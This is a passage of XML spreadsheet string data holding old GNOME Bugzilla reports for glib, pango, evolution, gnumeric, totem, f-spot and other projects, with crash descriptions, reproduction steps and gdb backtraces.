  <si>
    <t>The README file is empty</t>
  </si>
  <si>
    <t>An empty README file is really useless. Please either write some interesting paragraphs there or remove it.</t>
  </si>
  <si>
    <t>GLIB-134877</t>
  </si>
  <si>
    <t>FAIL: child-test Unlocking unlocked mutex</t>
  </si>
  <si>
    <t>With NetBSD's libpthread in diagnostic mode and glib CVS code of
19-Feb-2004 child-test fails with:
child-test: Error detected by libpthread: Unlocking unlocked mutex.
#0  0x4810896b in kill () from /usr/lib/libc.so.12
#1  0x480e8d11 in pthread__errorfunc () from /usr/lib/libpthread.so.0
#2  0x480e6103 in pthread_mutex_unlock () from /usr/lib/libpthread.so.0
#3  0x48084329 in child_watch_helper_thread (data=0x0) at gmain.c:3365
#4  0x480975ec in g_thread_create_proxy (data=0x804b260) at gthread.c:601
#5  0x480e7c6d in pthread_create () from /usr/lib/libpthread.so.0
So whose unlocked mutex are we unlocking?
(gdb) frame 3
#3  0x48084329 in child_watch_helper_thread (data=0x0) at gmain.c:3365
(gdb) what main_context_list
type = GSList *
(gdb) print * main_context_list
$1 = {data = 0x804f000 next = 0x0}</t>
  </si>
  <si>
    <t>prlw1</t>
  </si>
  <si>
    <t>PANGO-345600</t>
  </si>
  <si>
    <t>cvs build error in pango/opentype/Makefile</t>
  </si>
  <si>
    <t>Log (useless) on http://jhbuild.bxlug.be/builds/2006-06-21-0006/logs/pango/#build
pango/opentype/Makefile.am didn't change but the generated Makefile (and Makefile.in) got invalid in this build.  Don't know the cause.
Makefile.in (thus Makefile) contains near the top: 
SOURCES =
        ftglue.c
        harfbuzz-buffer.c
        ...
Note the lack of backslashes.  (files attached)
I tried different things and discovered modifying Makefile.am to use SRC instead of SOURCES (line 8 &amp; 37) fixed the problem.
This may also be a bug in automake but it didn't get updated recently (this is automake from Debian sarge package 1.9.5-1).</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-25519</t>
  </si>
  <si>
    <t>crash with unknown cause</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.2
Synopsis: crash with unknown cause
Class:    sw-bug
Distribution: Debian woody
System: Linux 2.2.17 i686 unknown
C library: C library 2.1.3-13
C compiler: 2.95.2
glib: 1.2.8
GTK+: GTK+ 1.2.8-helix2
ORBit: ORBit 0.5.3
libxml: 2.2.2
gnome-print: gnome-print 
gnome-core: gnome-core 1.2.1-helix6
Description:
Just clicking(TM)
Debugging information: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0x4051ed29 in wait4 () from /lib/libc.so.6
#0  0x4051ed29 in wait4 () from /lib/libc.so.6
#1  0x40579cd8 in __check_rhosts_file () from /lib/libc.so.6
#2  0x401363d8 in gnome_init () from /usr/lib/libgnomeui.so.32
#3  0x404c0868 in sigaction () from /lib/libc.so.6
#4  0x804f371 in local_mime_get_value ()
#5  0x40087195 in g_hash_table_foreach () from /usr/lib/libglib-1.2.so.0
#6  0x804f572 in local_mime_get_value ()
#7  0x804f59e in write_initial_keys ()
#8  0x804af3f in _start ()
#9  0x40284d41 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#10 0x402b368c in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#11 0x402b2af5 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#12 0x402b0f36 in gtk_signal_emit_by_name () from /usr/lib/libgtk-1.2.so.0
#13 0x4001e0e8 in _capplet_widget_server_cancel ()
   from /usr/lib/libcapplet.so.0
#14 0x4001e3fa in _capplet_widget_server_page_shown ()
   from /usr/lib/libcapplet.so.0
#15 0x4001ebc4 in _ORBIT_skel_GNOME_capplet_cancel ()
   from /usr/lib/libcapplet.so.0
#16 0x40054955 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#17 0x40056b42 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#18 0x40056d71 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#19 0x40072494 in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#20 0x400c5380 in goad_register_arguments () from /usr/lib/libgnorba.so.27
#21 0x40088bf0 in g_io_add_watch () from /usr/lib/libglib-1.2.so.0
#22 0x4008a2b9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#23 0x4008a8c3 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#24 0x4008aa5c in g_main_run () from /usr/lib/libglib-1.2.so.0
#25 0x40283457 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#26 0x4001e555 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#27 0x4001dedc in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#28 0x804b503 in main ()
#29 0x404baa52 in __libc_start_main () from /lib/libc.so.6
#0  0x4051ed29 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40579cd8 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x401363d8 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x404c0868 in sigaction () from /lib/libc.so.6
No symbol table info available.
#4  0x804f371 in local_mime_get_value ()
No symbol table info available.
#5  0x40087195 in g_hash_table_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x804f572 in local_mime_get_value ()
No symbol table info available.
#7  0x804f59e in write_initial_keys ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:39 -------
This bug was previously known as bug 25519 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=25519
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (meier@o-matic.de) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>meier</t>
  </si>
  <si>
    <t>EVOLUTION-324319</t>
  </si>
  <si>
    <t>Please describe the problem:
When you focus on a message with some attachments you can not open attachment
bar with gok. Because there is no item relating to the attachment bar you can
not find some thing like [Open|Toggle] attachment.
Steps to reproduce:
1. Launch evolution and gok
2. Focus on a message with some attachments
3. Open the attachment bar in the panel that contains the body of message
Actual results:
The attachment bar should be opened and the attachment icons in the bar will be
displayed.
Expected results:
The attachment bar can not be opened
Does this happen every time?
Happen every time.
Other information:</t>
  </si>
  <si>
    <t>GDK-PIXBUF-50980</t>
  </si>
  <si>
    <t>revamp inlined pixbuf code</t>
  </si>
  <si>
    <t>the current inlined pixbuf code needs to be reworked to use the GIMP
c-source code which deals with stringification of byte arrays and
run-length encoding. (resubmitting this the initial report did not
seem to go through).</t>
  </si>
  <si>
    <t>ANJUTA-516685</t>
  </si>
  <si>
    <t>core application</t>
  </si>
  <si>
    <t>New artwork for splash screen</t>
  </si>
  <si>
    <t>I've seen some other requests about updating the icons so while we're at it let's update the Slash screen too.
Alternatively we should kill the splash screen if it's possible and just load the plugins in the background after the UI is shown.</t>
  </si>
  <si>
    <t>ripzonetriton</t>
  </si>
  <si>
    <t>TOTEM-499144</t>
  </si>
  <si>
    <t>[RFE] The tracker plugin should have a more nituitive name</t>
  </si>
  <si>
    <t>For example Search or Video Search .</t>
  </si>
  <si>
    <t>Victor.Osadci.GNOME</t>
  </si>
  <si>
    <t>GNUMERIC-156456</t>
  </si>
  <si>
    <t>desktop file should use %U not %F</t>
  </si>
  <si>
    <t>According to the freedesktop specification for desktop files:
%F	 A list of files. Use for apps that can open several local files at once.
%U	 A list of URLs.
Gnumeric is using %F for the moment so nautilus doesn't support it to open files
on network share.</t>
  </si>
  <si>
    <t>GLIB-500361</t>
  </si>
  <si>
    <t>Improve docs for g_array_free() and g_ptr_array_free()</t>
  </si>
  <si>
    <t>Docs for g_array_free() should say how the return value should be freed later (g_free() I assume).
Same for g_ptr_array_free().  Also g_ptr_array_free() docs are really minimal.  They can use a copy from g_array_free().</t>
  </si>
  <si>
    <t>GTKHTML-311106</t>
  </si>
  <si>
    <t>increasing or decreasing the font size from the format menu in compose mail window has no effect</t>
  </si>
  <si>
    <t>Distribution/Version: SuSE 9.3
1. Open the compose mail window
2. Verify that HTML in the format menu is not checked. Type some text in the
body of the mail and select it.
3. Now goto format &gt; text size and select one of the options under that.
4. The text size neither increases nor decreases
Expected results:
The menu items should either be disabled 
or
the font size should take effect when the option is selected.
One more issue is that even if HTML is selected selecting -2 and -1 from the
font size menu has no effect on the font size.</t>
  </si>
  <si>
    <t>F-SPOT-407891</t>
  </si>
  <si>
    <t>0.3.3 crashes upon start</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. run f-spot
2. watch Starting new FSpot server scroll many many times.
3. 
Stack trace:
(gdb) thread apply all bt
Thread 3 (Thread -1216037984 (LWP 6657)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7edabf6 in __nanosleep_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0x080f7004 in mono_type_full_name ()
#3  0xb7ed4504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#4  0xb7e4251e in clone () from /lib/tls/i686/cmov/libc.so.6
Thread 2 (Thread -1221702752 (LWP 6658)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7ed7a8c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0x080f9cba in mono_type_full_name ()
#3  0x080fc4f9 in mono_type_full_name ()
#4  0x080fc565 in mono_type_full_name ()
#5  0x0810aa28 in mono_pthread_key_for_tls ()
#6  0x00000004 in ?? ()
#7  0xb72e4328 in ?? ()
#8  0x080f8030 in mono_type_full_name ()
Previous frame inner to this frame (corrupt stack?)
Thread 1 (Thread -1210632512 (LWP 6656)):
#0  0xffffe410 in __kernel_vsyscall ()
---Type  to continue or q  to quit---
#1  0xb7ed8617 in pthread_kill () from /lib/tls/i686/cmov/libpthread.so.0
#2  0x081203f2 in GC_start_blocking ()
#3  0x08120445 in GC_start_blocking ()
#4  0x08114363 in mono_path_resolve_symlinks ()
#5  0x08114757 in mono_path_resolve_symlinks ()
#6  0x08114acc in mono_path_resolve_symlinks ()
#7  0x08114f8c in mono_path_resolve_symlinks ()
#8  0x08117a3e in mono_path_resolve_symlinks ()
#9  0x08118433 in mono_path_resolve_symlinks ()
#10 0x0811f8d4 in GC_start_blocking ()
#11 0x0809904b in mono_string_new_size ()
#12 0x0809909e in mono_string_new_utf16 ()
#13 0x08099171 in mono_string_from_utf16 ()
#14 0x08140273 in mono_add_varcopy_to_end ()
#15 0x08140f06 in mono_add_varcopy_to_end ()
#16 0x08142791 in mono_add_varcopy_to_end ()
#17 0x0807fdaa in mono_magic_trampoline ()
#18 0xb7c59032 in ?? ()
#19 0xbf47048c in ?? ()
#20 0xb72e7a35 in ?? ()
#21 0x0820516c in ?? ()
#22 0x00000000 in ?? ()
#0  0xffffe410 in __kernel_vsyscall ()
(gdb) cont
Continuing.
Program received signal SIGXCPU CPU time limit exceeded.
0xffffe410 in __kernel_vsyscall ()
(gdb) cont
Continuing.
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1210632512 (LWP 6656)]
0x0811bb7e in GC_push_all_stack ()
(gdb) cont
Continuing.
Program received signal SIGSEGV Segmentation fault.
0x0811bb7e in GC_push_all_stack ()
(gdb) cont
Continuing.
Couldn't get registers: No such process.
Other information:
This bug appears only on one laptop after upgrading to latest SVN on 02/13/07. The same update on another computer did not probe the identical problem. On the screen the following happens:
1) the following repeated many times:
Starting new FSpot server
2) until it says
Segmentation Fault
but does not produce a core file.
I have tried to do a full-download with svn and recompiled everything. The outcome was same.
Previously I was using about a week old SVN version.</t>
  </si>
  <si>
    <t>durduran</t>
  </si>
  <si>
    <t>GNUMERIC-153631</t>
  </si>
  <si>
    <t>The description of recalclag is unclear</t>
  </si>
  <si>
    <t>I have problems understanding the following message:
#: schemas/gnumeric-general.schemas.in.h:13
msgid 
If this value is positive auto expressions are recalculated within that 
many millesecond after a change. If it is negative they are recalculated 
with the magnitude many milleseconds after the last change where 'last' is 
defined as the end of a period of that size after a change with no changes.
My interpretation is that positive lag means that auto expressions are
recalculated at most `lag' milleseconds after a change.
Negative lag means that gnumeric first waits for a quiescent period of length
|lag| milleseconds (quiescent means that no change appears during it) and then
starts recalculating it has another |lag| milleseconds to complete the
recalculation.
Please fix the description.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-160310</t>
  </si>
  <si>
    <t>gnome-multiload-applet crashes on startup</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: gnome-applets
Severity: normal
Version: GNOME2.9.2 unspecified
Gnome-Distributor: Ubuntu
Synopsis: gnome-multiload-applet crashes on startup
Bugzilla-Product: gnome-applets
Bugzilla-Component: multiload
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
Immediately after logging into Gnome g-m-a crashed. This has happened
only once to me so far.
Debugging Information:
Backtrace was generated from '/usr/libexec/multiload-applet-2'
Using host libthread_db library /lib/tls/libthread_db.so.1.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1223454048 (LWP 6464)]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0xb7daa40e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb7daa40e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7f8a3dd in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0xb7c39f50 in gtk_widget_modify_style () from
/usr/lib/libgtk-x11-2.0.so.0
#4  0x0804dbab in multiload_change_background_cb ()
#5  0xb7fda00f in panel_applet_marshal_VOID__ENUM_BOXED_OBJECT ()
   from /usr/lib/libpanel-applet-2.so.0
#6  0xb78e36e6 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#7  0xb78f6365 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#8  0xb78f53cc in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#9  0xb78f5666 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#10 0xb7fd7740 in panel_applet_get_background ()
   from /usr/lib/libpanel-applet-2.so.0
#11 0xb7850d06 in bonobo_marshal_VOID__BOXED_UINT_BOXED ()
   from /usr/lib/libbonobo-2.so.0
#12 0xb78e36e6 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#13 0xb7851fe0 in bonobo_closure_invoke_va_list ()
   from /usr/lib/libbonobo-2.so.0
#14 0xb7852247 in bonobo_closure_invoke () from
/usr/lib/libbonobo-2.so.0
#15 0xbffff2c0 in ?? ()
#16 0xbffff32c in ?? ()
#17 0xb7743398 in ?? () from /usr/lib/libglib-2.0.so.0
#18 0xb7da6694 in pthread_mutex_lock () from /lib/tls/libpthread.so.0
#19 0x080f6a38 in ?? ()
#20 0xbffff288 in ?? ()
#21 0xb76eeaaf in g_malloc0 () from /usr/lib/libglib-2.0.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-12-03 05:04 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gnome-applets.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was martin@piware.de.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GEDIT-120351</t>
  </si>
  <si>
    <t>Vertically resizing Open File dialog shouldn't change Character Coding button</t>
  </si>
  <si>
    <t>Problem:
Vertically resizing the Open File dialog also resizes the Character Coding
button. Doesn't really make sense because this wastes valuable space of the
Folders and Files lists. Ideally the height of the Character Coding button
should not change.
Version:
gedit-2.3.3</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-317226</t>
  </si>
  <si>
    <t>bug about recurrent all day events</t>
  </si>
  <si>
    <t>Distribution/Version: SuSE
Import a all recurrent all day event from a file or create recurrent all day
events in jescs calendar folder or  the created recurrent all day events span
two days for example from 08:00 today to 08:00 tommorow but it should span
only one day from 0:00 to 24:00.
The reason is that the recurrent all day event is a instance the zone field of
start_time and end_time we get from this instance is NULL at line 3614 of
calendar/libecal/e-cal.c(generate_instances) so start time and end time we
calculated are wrong.</t>
  </si>
  <si>
    <t>GTK+-140496</t>
  </si>
  <si>
    <t>Class: UIManager / Actions</t>
  </si>
  <si>
    <t>Menus have extra separators after gtk_widget_show_all()</t>
  </si>
  <si>
    <t>When calling gtk_widget_show_all() on GtkMenuBars or GtkToolbars that have been
created with GtkUIManager extra separators appear. I guess that show_all should
be reimplemented for these widgets to prevent this.</t>
  </si>
  <si>
    <t>GNOME-UTILS-37190</t>
  </si>
  <si>
    <t>idetool</t>
  </si>
  <si>
    <t>Crash when using arrow keys (idetool Crash at 204.221.55.201)</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-utils
Version: 1.2.0
Severity: 
&gt;Synopsis: Crash when using arrow keys
&gt;Class: sw-bug
System: i686 RH linux 7
&gt;Description:
Open idetool.
Use arrow keys to select different fields in window.
Causes segmentation fault.
&gt;How-To-Repeat:
see above
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 12:02 -------
This bug was previously known as bug 37190 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=37190
Originally filed under the gnome-utils product and general component.
Unknown version 1.2.x in product gnome-utils. Setting version to the default unspecified.
The original reporter (dmillion2@aol.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-utils-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>dmillion2</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-301363</t>
  </si>
  <si>
    <t>Evolutions timezone data is seriously incomplete and out-of-date</t>
  </si>
  <si>
    <t>Please describe the problem:
Evolutions seems to have problems with timezone data. It probably uses out of
date information for timezones.
Steps to reproduce:
1. Change your Evolution timezone to Asia/Tehran.
2. Set a meeting on April 20 2005 starting on America/Los_Angeles time 08:00.
Actual results:
A meeting is created on Tehran time 18:30 (6:30 PM).
Expected results:
The meeting should be on 19:30 since (on April 20) Los Angeles is 7 hours
behind UTC while Tehran is 4:30 hours after UTC which would result in 11:30
hours of difference NOT 10:30 hours.
Does this happen every time?
Yes. I could even reproduce it on both Evolution 2.0.4 and Evolution 2.2.2.
Other information:
Probably an updated timezone data may solve the problem (or it may not).</t>
  </si>
  <si>
    <t>GNOME-MEDIA-84477</t>
  </si>
  <si>
    <t>Gnome-cd hangs when started with no cd in the drive (Solaris)</t>
  </si>
  <si>
    <t>When gnome-cd is started with out a cd in the drive it hangs in Sparc
solrais machine.</t>
  </si>
  <si>
    <t>GNUMERIC-62223</t>
  </si>
  <si>
    <t>Deleting row of header info crashes gnumeric</t>
  </si>
  <si>
    <t>If there is a scatter plot with the first row being headers deleting that
row crashes gnumeric
1) new gnumeric
2) c2 gets hi c3:c6 get 1:4
3) d2 gets bye d3:d6 get {23242355}
4) select c3:d6
5) graph guru scatter plot
6) delete row 5
--&gt; no problem data point disapears
7) delet row 2
--&gt; crash</t>
  </si>
  <si>
    <t>TOTEM-169075</t>
  </si>
  <si>
    <t>Doesn't handle broken audio/playlist MIME type</t>
  </si>
  <si>
    <t>CD Baby uses the MIME type audio/playlist when serving M3U files for example
thr Tracks links on http://cdbaby.com/cd/furley.
This means I can't get Totem to handle the links straight from my web browser
and if I paste the link into Open Location Totem claims it doesn't know what to
do with the file type.</t>
  </si>
  <si>
    <t>GTKVTS-117397</t>
  </si>
  <si>
    <t>gtkvts test Selections-34 hangs</t>
  </si>
  <si>
    <t>The test for Selections test purpose 34 hangs.
It can only be cleared by killing the test process.</t>
  </si>
  <si>
    <t>derek.rafter</t>
  </si>
  <si>
    <t>GTKVTS-97619</t>
  </si>
  <si>
    <t>bug_inf should be initialized at the beginning of every test</t>
  </si>
  <si>
    <t>bug_inf should be initialized at the beginning of every test.
In other case if a test with bug_inf != NULL SEGVs then bug_info will be
always printed to tet_xres for the next text even if it doesn't have any
bug info. 
See GtkListStore tests.</t>
  </si>
  <si>
    <t>maa</t>
  </si>
  <si>
    <t>GNUMERIC-136965</t>
  </si>
  <si>
    <t>change marker colour causes crash</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: Gnumeric
Severity: normal
Version:  1.2.x
Synopsis: change marker colour causes crash
Bugzilla-Product: Gnumeric
Bugzilla-Component: GUI
Bugzilla-Version: 1.2.x
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
Changing the fill colour of markers in a Line chart causes Gnumeric to
crash.
Steps to reproduce the crash:
1. Insert &gt; Chart
2. Plot Type: Line
3. Series1 Style Marker Fill Colour ...
4. Select 'black'
Expected Results:
A friendly crash-catching bug-report-suggesting dialog pops up :)
How often does this happen?
Consistently (twice by mistake then reproduced twice)
Debugging Information:
Backtrace was generated from '/usr/bin/gnumeric'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New
Thread 16384 (LWP 2176)]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0x40e6ebd8 in waitpid () from /lib/libpthread.so.0
#0  0x40e6ebd8 in waitpid () from /lib/libpthread.so.0
#1  0x400cda94 in valid () from /usr/lib/libgnomeui-2.so.0
#2  0x40e6d815 in __pthread_sighandler () from /lib/libpthread.so.0
#3  0x40f744a8 in __libc_sigaction () from /lib/libc.so.6
#4  0x0808358d in gnm__VOID__POINTER_BOOLEAN_BOOLEAN_BOOLEAN ()
#5  0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#6  0x40d53da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#7  0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#8  0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#9  0x081994ef in color_combo_get_type ()
#10 0x0808358d in gnm__VOID__POINTER_BOOLEAN_BOOLEAN_BOOLEAN ()
#11 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#12 0x40d53da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#13 0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#14 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#15 0x081980a0 in color_palette_get_type ()
#16 0x081983a4 in color_palette_get_type ()
#17 0x40d54212 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#18 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#19 0x40d53da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#20 0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#21 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#22 0x4081c7f5 in gtk_button_clicked () from
/usr/lib/libgtk-x11-2.0.so.0
#23 0x4081d7ab in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
#24 0x40d54212 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#25 0x40d43d44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#26 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#27 0x40d536c4 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#28 0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#29 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#30 0x4081c745 in gtk_button_released () from
/usr/lib/libgtk-x11-2.0.so.0
#31 0x4081d62b in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
#32 0x408a59e4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#33 0x40d43d44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#34 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#35 0x40d53895 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#36 0x40d52ca3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#37 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#38 0x40987ca7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#39 0x408a57a7 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#40 0x408a4506 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#41 0x40a61845 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#42 0x40f07086 in unblock_source () from /usr/lib/libglib-2.0.so.0
#43 0x40f08029 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#44 0x40f08347 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#45 0x40f089b0 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#46 0x408a3d2f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#47 0x08157f8b in main ()
#48 0x40f60dc6 in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 16384 (LWP 2176)):
#0  0x40e6ebd8 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x400cda94 in valid () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x40e6d815 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40f744a8 in __libc_sigaction () from /lib/libc.so.6
No symbol table info available.
#4  0x0808358d in gnm__VOID__POINTER_BOOLEAN_BOOLEAN_BOOLEAN ()
No symbol table info available.
#5  0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#6  0x40d53da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x081994ef in color_combo_get_type ()
No symbol table info available.
#10 0x0808358d in gnm__VOID__POINTER_BOOLEAN_BOOLEAN_BOOLEAN ()
No symbol table info available.
#11 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x40d53da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x081980a0 in color_palette_get_type ()
No symbol table info available.
#16 0x081983a4 in color_palette_get_type ()
No symbol table info available.
#17 0x40d54212 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x40d53da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x4081c7f5 in gtk_button_clicked () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x4081d7ab in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x40d54212 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x40d43d44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x40d536c4 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x40d52ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x4081c745 in gtk_button_released () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x4081d62b in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x408a59e4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x40d43d44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x40d43a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x40d53895 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x40d52ca3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0x40d530d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0x40987ca7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x408a57a7 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x408a4506 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0x40a61845 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#42 0x40f07086 in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#43 0x40f08029 in g_main_context_dispatch () from
